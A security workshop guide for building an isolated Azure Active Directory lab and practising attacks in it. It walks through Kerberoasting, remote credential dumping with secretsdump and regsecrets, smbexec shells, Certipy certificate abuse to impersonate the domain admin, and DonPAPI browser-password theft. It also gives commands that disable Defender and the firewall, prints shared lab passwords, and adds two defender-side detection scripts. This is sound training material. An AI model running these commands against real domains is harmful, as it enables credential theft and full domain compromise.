This repo was created for the gracious folks at Wild West Hackin' Fest, who picked us up, dusted us off and said "here's another chance guys, go get 'em!" ...and who gave us an opportunity to run a rapid fire workshop about lab building.
Anyway, here's how the Defensive Origins crew builds labs!
- Lab Building 101
- Building a Lab on Azure with ARM
- Connecting to Infrastructure
- Installing Tools Rapid Fire Style
- Tools:
  - Badblood
  - Impacket GetADUsers.py
  - Impacket GetUsersSPNs.py
  - Impacket Secretsdump.py
  - Impacket smbexec.py
  - Impacket getTGT.py
  - Impacket addcomputer.py
  - Impacket regsecrets.py
  - Windows ADCS
  - PowerShell ADCSTemplate
  - Certipy (Find/Request/Auth)
  - DonPAPI
Time to deploy: Approximately 30-60 minutes
Authenticate to your Azure portal (URL, browser on the student's local system):
https://portal.azure.com
Then, go to the hosted ARM template resource page in a new browser tab (URL, browser on the student's local system):
https://www.doazlab.com
About half way down the page, click the Deploy to Azure button.
Select your subscription, resource group, and location. Document this location; it will be needed later in class.
The default VM size is B2s, which is a burstable, low-cost, and efficient VM size. You can bump this up to a larger size should you choose.
Your next configuration option is the network range allowed to access this lab's public IP addresses. We will investigate some Internet-based threats later in the course and recommend leaving this at the configured all-zeroes (0.0.0.0/0) range, which is wide open.
One more click will bring you to the validation check. After a moment, you can click on Create to start the build process for your ADD Lab Environment.
The process takes between 25 and 30 minutes to fully deploy. The deployment confirmation shown next is indicative of a successful build.
The Outputs option in the left navigation tree includes the access details you will need for SSH and RDP access into the lab environment. Document these IP addresses as you will need them later to access your lab infrastructure.
A visual aid for your lab deployment is shown in the next image.
When logging into the Windows system, use the following credentials.
doazlab\doadmin DOLabAdmin1!
When logging into the Linux system, use the following credentials.
doadmin DOLabAdmin1!
The screenshot in this section demonstrates the output values from the course ARM template deployment.
You will need all of these at various points throughout the course material. You should keep them handy in a notes document or similar quick-reference.
Step complete. Go to the next step!
Establish RDP to the workstation and domain controller (Linux with Remmina)
From Linux, you can use the Remmina remote desktop (RDP) client software.
Note: Be sure to include the domain on the initial RDP connections: doazlab\doadmin DOLabAdmin1!
Establish an RDP connection to the IP address of your lab's domain controller. You will be prompted to accept a certificate that should match DC01.doazlab.com.
Establish an RDP connection to the IP address of your lab's workstation. You will be prompted to accept a certificate that should match WS05.doazlab.com.
The domain controller will prompt you to accept the discovery settings. The lab is isolated and general guidance is to click Yes.
The first login to the workstation will require approximately ten minutes to fully build the user profile and desktop environment.
Step complete. Go to the next step!
Establish RDP connections to the workstation and domain controller (Windows terminal services client)
The following screenshot includes an example mstsc connection string. Your IP address will differ.
Be sure to include the domain on the initial RDP connections.
doazlab\doadmin DOLabAdmin1!
Establish an RDP connection to the IP address of your lab's domain controller. You will be prompted to accept a certificate that should match DC01.doazlab.com.
Establish an RDP connection to the IP address of your lab's workstation. You will be prompted to accept a certificate that should match WS05.doazlab.com.
The domain controller will prompt you to accept the discovery settings. This lab is isolated and general guidance is to click Yes.
The first login to the workstation will require approximately ten minutes to fully build the user profile and desktop environment. The desktop background is generated by bginfo.exe so you have a quick reference for which system you have accessed.
Run the following command on the workstation from the Admin PowerShell prompt as shown in the subsequent screenshot. Note that there is a shortcut on the desktop that launches an Admin PowerShell.
PowerShell input, workstation WS05:
```powershell
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
```
This is shown in the next screenshot.
Also, defang AV with the following commands.
PowerShell input, workstation WS05:
```powershell
New-Item -ItemType Directory -Path "C:\DOAZLab" -Force > $null
# Both paths in one call: Set-MpPreference replaces the exclusion list rather than appending to it.
Set-MpPreference -ExclusionPath 'c:\users\doadmin', 'c:\DOAZLab'
Set-MpPreference -ExclusionProcess "powershell.exe", "cmd.exe"
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -EnableNetworkProtection AuditMode
Set-MpPreference -Force -MAPSReporting Disabled
Set-MpPreference -SubmitSamplesConsent NeverSend
```
Step complete. Go to the next step!
Bash input, Linux host Nux01:
```bash
ssh doadmin@'YOUR-PUB-C2-IP'
```
Credentials: doadmin DOLabAdmin1!
Did you know you can SSH directly from Windows 10 without additional installation, packages, or software? You can, straight from PowerShell.
PowerShell input:
```powershell
ssh doadmin@'YOUR-PUB-C2-IP'
```
Step complete. Go to the next step!
You need root permissions for most of the tools in this lab, so sudo up.
```bash
sudo -s
```
We packed a bunch of tools onto your Linux system during the build process. We regularly wrap Python tools in virtual environments, so be prepared to `activate` and `deactivate` them. Also, install virtualenv.
```bash
apt install python3-virtualenv -y
```
Or, use pip.
```bash
pip3 install virtualenv
```
Now, let's rock and roll. One of the tools we didn't install via bootstrap on the Linux box was DonPAPI. This is a browser shredder (and more). Copy and paste the following block into your Linux terminal.
```bash
cd /opt/
git clone https://github.com/login-securite/DonPAPI
cd DonPAPI
virtualenv -p python3 dp-env
source dp-env/bin/activate
python3 -m pip install .
DonPAPI -h
```
Jump over to the dc01 RDP session.
This tool makes a mess out of an existing lab environment, your production AD, or anywhere you run it. **This is dangerous!!! DO NOT RUN IN PRODUCTION**
When logging into the Windows system, use the following credentials.
doazlab\doadmin DOLabAdmin1!
Conduct Lab Operations from Domain Controller DC01
First, download and invoke BadBlood.
**This is dangerous!!! DO NOT RUN IN PRODUCTION**
The following commands should be pasted into a PowerShell terminal session on the domain controller.
PowerShell input, domain controller DC01:
```powershell
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -URI https://github.com/Relkci/BadBlood/archive/refs/heads/master.zip -OutFile badblood.zip
Expand-Archive .\badblood.zip
$ProgressPreference = 'Continue'
./badblood/BadBlood-master/invoke-badblood.ps1
```
Three strikes against the Enter key will result in a prompt to confirm your intentions. Again, DO NOT RUN THIS IN PRODUCTION. Typing the `badblood` keyword will then result in the creation of various AD objects, ACL tampering, and general pollution of your doazlab.com forest.
PowerShell input, domain controller DC01:
```
[ENTER] x 3
badblood
```
Some errors are expected.
Exit PowerShell's AD> prompt!
PowerShell input, domain controller DC01:
```powershell
exit
```
Step complete. Go to the next step!
When logging into the Windows system, use the following credentials.
doazlab\doadmin DOLabAdmin1!
When logging into the Linux system, use the following credentials.
doadmin DOLabAdmin1!
Conduct Lab Operations from Linux Host Nux01
Prepare the Python virtual environment (venv) that isolates Impacket's dependencies. Run the following commands to activate the environment and list Impacket's example tools.
Ensure you are root with sudo.
Bash input, Linux host Nux01:
```bash
sudo -s
```
Run the next commands as a code block to instantiate the venv and list the Python tools in the Impacket repo.
Bash input, Linux host Nux01:
```bash
deactivate   # harmless if no venv is currently active
cd /opt/impacket
source /root/pyenv/impacket/bin/activate
cd /opt/impacket/examples
ls
```
Step complete. Go to the next step!
Get Active Directory User Information
This Python script (GetADUsers.py) enumerates AD users, either individually or all at once. We are going to use it here to gather a list of users from the Active Directory environment, and for later use as the user list for password spraying.
The following command is used to dump the list of AD users to the console and to create a file (tee) in the /opt/ directory called adusers.txt.
Bash input, Linux host Nux01:
```bash
GetADUsers.py -all -ts doazlab.com/doadmin:'DOLabAdmin1!' -dc-ip 192.168.2.4 | tee -a /opt/adusers.txt
```
Step complete. Go to the next step!
All members of the "Domain Users" group can request a service ticket for any account with a configured service principal name (SPN). This is the attack known as "Kerberoasting". The KDC's response to the service ticket request contains material encrypted with the service account's password hash, which can potentially be cracked offline.
Let's gather hashes from the accounts running with assigned service principal names (SPNs). Why? These are the accounts for which any domain user can request Kerberos service tickets. Thus, the Kerberoast attack.
Bash input, Linux host Nux01:
```bash
mkdir /opt/hashes/
GetUserSPNs.py 'doazlab.com'/'doadmin':'DOLabAdmin1!' -dc-ip 192.168.2.4 -outputfile /opt/hashes/kerbs.txt
cat /opt/hashes/kerbs.txt | less -S
```
Use either `CTRL + C` or `q` to exit this view. The SPN hashes were saved to the file /opt/hashes/kerbs.txt.
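A defender-side counterpart to the Kerberoast step above, added here as an example (it is not part of the workshop or of Impacket): the logic a detection engineer would run over Security log 4769 events to surface one principal requesting RC4-encrypted service tickets for many SPN accounts. The event records, field names, threshold and IP addresses are constructed or assumed for this example.

```python
"""Flag the Kerberoasting request pattern in Windows Security log events.

Added example for the lab above (not part of the workshop or Impacket).
Assumes 4769 events were exported to dicts with the field names below;
every event here is constructed for this example.
"""
from collections import defaultdict

# TicketEncryptionType value logged in event 4769 for RC4-HMAC tickets.
RC4_HMAC = "0x17"


def ev(user, service, etype, ip, status="0x0"):
    """Build a constructed 4769 (Kerberos service ticket requested) record."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed sample: one account pulls RC4 tickets for three SPN accounts
# (the footprint a bulk SPN ticket request leaves on the DC); the rest is noise.
SAMPLE_EVENTS = [
    ev("noprivuser@DOAZLAB.COM", "sqlsvc", "0x17", "::ffff:192.168.2.7"),
    ev("noprivuser@DOAZLAB.COM", "httpsvc", "0x17", "::ffff:192.168.2.7"),
    ev("noprivuser@DOAZLAB.COM", "backupsvc", "0x17", "::ffff:192.168.2.7"),
    ev("jdoe@DOAZLAB.COM", "WS05$", "0x12", "::ffff:192.168.2.5"),      # AES, machine account
    ev("jdoe@DOAZLAB.COM", "legacysvc", "0x17", "::ffff:192.168.2.5"),  # one-off RC4 request
    ev("jdoe@DOAZLAB.COM", "krbtgt", "0x17", "::ffff:192.168.2.5"),     # TGT, not roastable
    ev("jdoe@DOAZLAB.COM", "sqlsvc", "0x17", "::ffff:192.168.2.5", status="0x6"),  # failed
]


def is_kerberoast_candidate(event):
    """True for a successful RC4 service-ticket request against a user-style
    (non-machine, non-krbtgt) service account; AES tickets never match."""
    if event.get("EventID") != 4769 or event.get("Status") != "0x0":
        return False
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False
    return event.get("TicketEncryptionType") == RC4_HMAC


def find_kerberoasting(events, threshold=3):
    """Group candidate requests by (requesting account, source IP) and return
    the sources that asked for RC4 tickets to at least `threshold` distinct
    SPN accounts, together with the services they touched."""
    per_source = defaultdict(set)
    for event in events:
        if is_kerberoast_candidate(event):
            per_source[(event["TargetUserName"], event["IpAddress"])].add(event["ServiceName"])
    return {src: sorted(svcs) for src, svcs in per_source.items() if len(svcs) >= threshold}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user} from {ip}: {', '.join(services)}")
```

Tuning the threshold and allow-listing known RC4-only legacy services keeps the one-off `legacysvc` request in the sample from paging anyone.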
Step complete. Go to the next step!
We are next going to take some liberties with our privileged position to check out Secretsdump. This tool will attempt to gather credential material from a remote system to which the analyst has recovered some form of privileged credentials.
The account credential used to access the environment has sufficient privilege to start the RemoteRegistry service and access credential material through the various secrets storage locations in Microsoft's operating systems. The next command uses secretsdump.py to attempt a remote credential dump and the tee -a command to write STDOUT to a file in the /opt/hashes/ directory.
Bash input, Linux host Nux01:
```bash
mkdir -p /opt/hashes   # -p: the directory already exists from the previous step
secretsdump.py doazlab/doadmin:'DOLabAdmin1!'@192.168.2.5 | tee -a /opt/hashes/secrets-output.txt
```
You will be prompted for a password.
Bash input, Linux host Nux01:
```
DOLabAdmin1!
```
Step complete. Go to the next step!
The smbexec.py utility establishes a semi-interactive shell to a remote host. This is not an opsec-safe tool and will get caught by most EDR products.
Bash input, Linux host Nux01:
```bash
python3 smbexec.py doazlab.com/doadmin:'DOLabAdmin1!'@192.168.2.5
```
Commands typed into the resulting smbexec shell, Linux host Nux01:
```
net localgroup administrators
ipconfig
whoami
hostname
nslookup doazlab.com
netsh advfirewall set allprofiles state off
exit
```
Step complete. Go to the next step!
The getTGT.py utility is used to request authentication tickets (Kerberos) from a known username and password (or hash) combination.
Bash input, Linux host Nux01:
```bash
python3 getTGT.py -dc-ip 192.168.2.4 doazlab.com/doadmin:'DOLabAdmin1!'
```
Bash input, Linux host Nux01:
```bash
ls
export KRB5CCNAME=/opt/impacket/examples/doadmin.ccache
```
The export process is shown in the next screenshot.
Install some additional packages for Kerberos on the Linux box with the following command.
```bash
apt-get install krb5-user libpam-krb5 libpam-ccreds -y
```
Then run `klist` to take a peek at the exported ticket(s). After export, the ticket should look something like the following.
Step complete. Go to the next step!
Let's use the Kerberos ticket we grabbed with getTGT.py to add a computer object to the domain. Always remember: any user can add up to ten computers to a domain by default (ms-DS-MachineAccountQuota). Trust us, you need to learn how to use ticketing and ticketing-related tools. NTLM will eventually be deprecated.
Bash input, Linux host Nux01:
```bash
python3 addcomputer.py -computer-name lowprivPC -computer-pass L0wPr1VSys -k -no-pass -dc-ip 192.168.2.4 doazlab.com/doadmin:'DOLabAdmin1!'@192.168.2.4 -dc-host dc01
```
Step complete. Go to the next step!
The regsecrets.py utility was designed as an improvement on the secretsdump.py utility. Regsecrets.py conducts a fileless interrogation of a targeted system's registry.
Take a look at the tool's help file too. Kent says: "Know your tools."
Bash input, Linux host Nux01:
```bash
python3 regsecrets.py
```
Use the following command to quietly and filelessly dump creds from the WS05 system.
Bash input, Linux host Nux01:
```bash
python3 regsecrets.py -k -no-pass -dc-ip 192.168.2.4 doazlab.com/[email protected] | tee -a /opt/hashes/192-168-2-5-secrets
```
Step complete. Go to the next step!
This lab is designed to teach participants how to install Active Directory Certificate Services (ADCS), import certificate templates using PowerShell and assess these vulnerabilities using Certipy.
Conduct Lab Operations from Domain Controller DC01
Launch PowerShell on the domain controller and install some important ADCS features.
PowerShell input, domain controller DC01:
```powershell
Get-WindowsFeature -Name AD-Certificate | Install-WindowsFeature
Add-WindowsFeature Adcs-Cert-Authority -IncludeManagementTools
```
Next, we will download previously exported templates. First, enter the c:\add folder.
PowerShell input, domain controller DC01:
```powershell
mkdir c:\add
cd c:\add
```
Next, download the templates with PowerShell.
PowerShell input, domain controller DC01:
```powershell
$wc = New-Object System.Net.WebClient
$wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_Computer.json', 'c:\add\DOAZLab_Computer.json')
$wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_User.json', 'c:\add\DOAZLab_User.json')
$wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_IPSec.json', 'c:\add\DOAZLab_IPSec.json')
ls c:\add
```
Next, import the certificate templates that were downloaded.
PowerShell input, domain controller DC01:
```powershell
net1 user noprivuser N0PrivU53R /add /domain
Install-Module ADCSTemplate -Force
New-ADCSTemplate -DisplayName DOAZLab_Computer -JSON (Get-Content c:\add\DOAZLab_Computer.json -Raw) -Publish
New-ADCSTemplate -DisplayName DOAZLab_User -JSON (Get-Content c:\add\DOAZLab_User.json -Raw) -Publish
New-ADCSTemplate -DisplayName DOAZLab_IPSec -JSON (Get-Content c:\add\DOAZLab_IPSec.json -Raw) -Publish
Set-ADCSTemplateACL -DisplayName DOAZLab_Computer -Enroll -Identity 'DOAZLab\Domain Computers'
Set-ADCSTemplateACL -DisplayName DOAZLab_User -Enroll -Identity 'DOAZLab\Domain Users'
Set-ADCSTemplateACL -DisplayName DOAZLab_IPSec -Enroll -Identity 'DOAZLab\Domain Users'
```
Conduct Lab Operations from Linux Host Nux01
Here, you will access a privileged terminal session, activate a virtual environment, and ask Certipy to find vulnerable ADCS templates.
The next command should not require a password (passwordless sudo).
Bash input, Linux host Nux01:
```bash
sudo -s
```
Next, we will run Certipy to assess the ADCS environment.
Bash input, Linux host Nux01:
```bash
cd /opt/Certipy
source /root/pyenv/Certipy/bin/activate
certipy find -vulnerable -target-ip 192.168.2.4 -u [email protected] -p 'N0PrivU53R' -output adcs-vulns
```
Inspect the produced results with the following command.
Bash input, Linux host Nux01:
```bash
cat adcs*.txt
```
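To make the Certipy findings above concrete from the auditing side, here is an added example (not Certipy's code and not the contents of the lab's template JSON) that checks template records for the combination of settings Certipy's `find -vulnerable` reports: a low-privileged enroller, no manager approval, a logon-capable EKU, and the enrollee being allowed to supply the subject name. The record layout, field names and the low-privilege group list are assumptions for this example.

```python
"""Audit certificate templates for settings that let a low-privileged enrollee
obtain a logon-capable certificate naming another principal.

Added example (not Certipy's code, not the lab's template JSON). The template
records and their field layout are constructed for this example.
"""

# msPKI-Certificate-Name-Flag bit: the requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: a certificate manager must approve each request.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# EKUs that make the issued certificate usable for domain logon.
LOGON_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enroll right means "any domain member" (assumed list).
LOW_PRIV_ENROLLERS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed template records mimicking a directory export.
TEMPLATES = [
    {"name": "Constructed-Weak", "enroll": ["Domain Users"], "enrollment_flags": 0x0,
     "name_flags": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "Constructed-Approved", "enroll": ["Domain Users"],
     "enrollment_flags": CT_FLAG_PEND_ALL_REQUESTS,
     "name_flags": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "Constructed-ADBuiltName", "enroll": ["Domain Users"], "enrollment_flags": 0x0,
     "name_flags": 0x0, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "Constructed-NoEKU", "enroll": ["Authenticated Users"], "enrollment_flags": 0x0,
     "name_flags": 0x0, "ekus": []},
    {"name": "Constructed-AdminOnly", "enroll": ["Domain Admins"], "enrollment_flags": 0x0,
     "name_flags": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "ekus": ["1.3.6.1.5.5.7.3.2"]},
]


def template_risks(t):
    """Return the reasons a low-privileged enrollee could turn this template into
    a certificate for another principal; an empty list means no finding."""
    reasons = []
    if not set(t["enroll"]) & LOW_PRIV_ENROLLERS:
        return reasons          # only privileged principals may enroll
    if t["enrollment_flags"] & CT_FLAG_PEND_ALL_REQUESTS:
        return reasons          # a manager approves every request
    ekus = set(t["ekus"])
    logon_capable = not ekus or bool(ekus & LOGON_EKUS)
    if t["name_flags"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and logon_capable:
        reasons.append("enrollee supplies the subject/SAN on a logon-capable certificate")
    if not ekus:
        reasons.append("no EKU restriction: certificate is valid for any purpose")
    return reasons


def audit(templates):
    """Map template name -> findings for every template that has at least one."""
    return {t["name"]: r for t in templates if (r := template_risks(t))}
```

Each finding maps to a remediation already visible in the lab's own setup: clear the supplies-subject flag, require manager approval, pin an EKU, or tighten the enroll ACL that Set-ADCSTemplateACL grants.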
In the next step, we will attempt to exploit one of the weak certificate templates. But first we need to find a user SID and set a shell variable. Basically, Microsoft tried to fix a thing with a cheesy little "protection" mechanism that requires a user's SID to be submitted with a certificate request. Legit, the time from the MS patch landing to it no longer being a fix was like 17 seconds.
Bash input, Linux host Nux01:
```bash
# rpcclient prints "<name> <SID> (User: 1)"; awk keeps the SID column
DOADMINSID=$(rpcclient -U noprivuser%'N0PrivU53R' 192.168.2.4 -c "lookupnames doadmin" | awk '{print $2}')
printf "\n $DOADMINSID \n\n"
certipy req -target-ip 192.168.2.4 -u [email protected] -p 'N0PrivU53R' -ca doazlab-DC01-CA -template DOAZLab_User -dc-ip 192.168.2.4 -upn [email protected] -sid $DOADMINSID
```
UnPac the Hash Attack
Bash input, Linux host Nux01:
```bash
certipy auth -pfx doadmin.pfx -dc-ip 192.168.2.4
```
Step complete. Go to the next step!
On the workstation, WS05, open all three installed browsers and paste the site link below into each browser's address bar.
URL, browsers on workstation WS05:
http://testphp.vulnweb.com/login.php
Chrome will probably try to talk you into signing in with one of your personal accounts. Click the Don't sign in button in the bottom right corner of the open Chrome window.
Also click the Skip button on the next page.
And also, yeah, click through the Got it button regarding Chrome's Enhanced ad privacy.
Finally, drop the URL in all the browser address bars.
http://testphp.vulnweb.com/login.php
Enter the following credentials in the respective browsers.
Chrome input:
- Username: chromeuser
- Password: chromepass1!
After inputting the username and password values, follow the operations described below and shown in the subsequent screenshot.
- Click the Login button.
- Click the circled key in the right portion of the address bar.
- Click Save to retain the credential in the browser.
Firefox input:
- Username: ffuser
- Password: firefoxpass1!
Firefox should prompt you to save any credential entered in this form. So, enter the credential and click Login.
As shown next, you should be prompted to save the credential. Click Save.
Edge input:
- Username: edgeuser
- Password: edgepass1!
The process for saving the password in Edge is similar. After clicking Login, click the ellipsis at the far right of the address bar. You will be prompted to, and should, click on Manage Passwords.
After clicking on Manage Passwords, you should be prompted to save the `edgeuser` credential entered in this form.
The following command will gather all passwords stored in browsers on the WS05 system at 192.168.2.5.
Bash input, Linux host Nux01:
```bash
deactivate
cd /opt/DonPAPI
source dp-env/bin/activate
donpapi collect -u doadmin -p 'DOLabAdmin1!' -t 192.168.2.5 --domain doazlab.com
```
Open a browser and search for `stealer logs 101`. An interesting link: https://www.zerofox.com/blog/an-introduction-to-stealer-logs/
Defensive Origins offers the following classes at Antisyphon Training:
- Assumed Compromise: https://www.antisyphontraining.com/assumed-compromise/
- Active Directory Security Hardening: https://www.antisyphontraining.com/product/active-directory-security-and-hardening-with-jordan-drysdale-and-kent-ickler/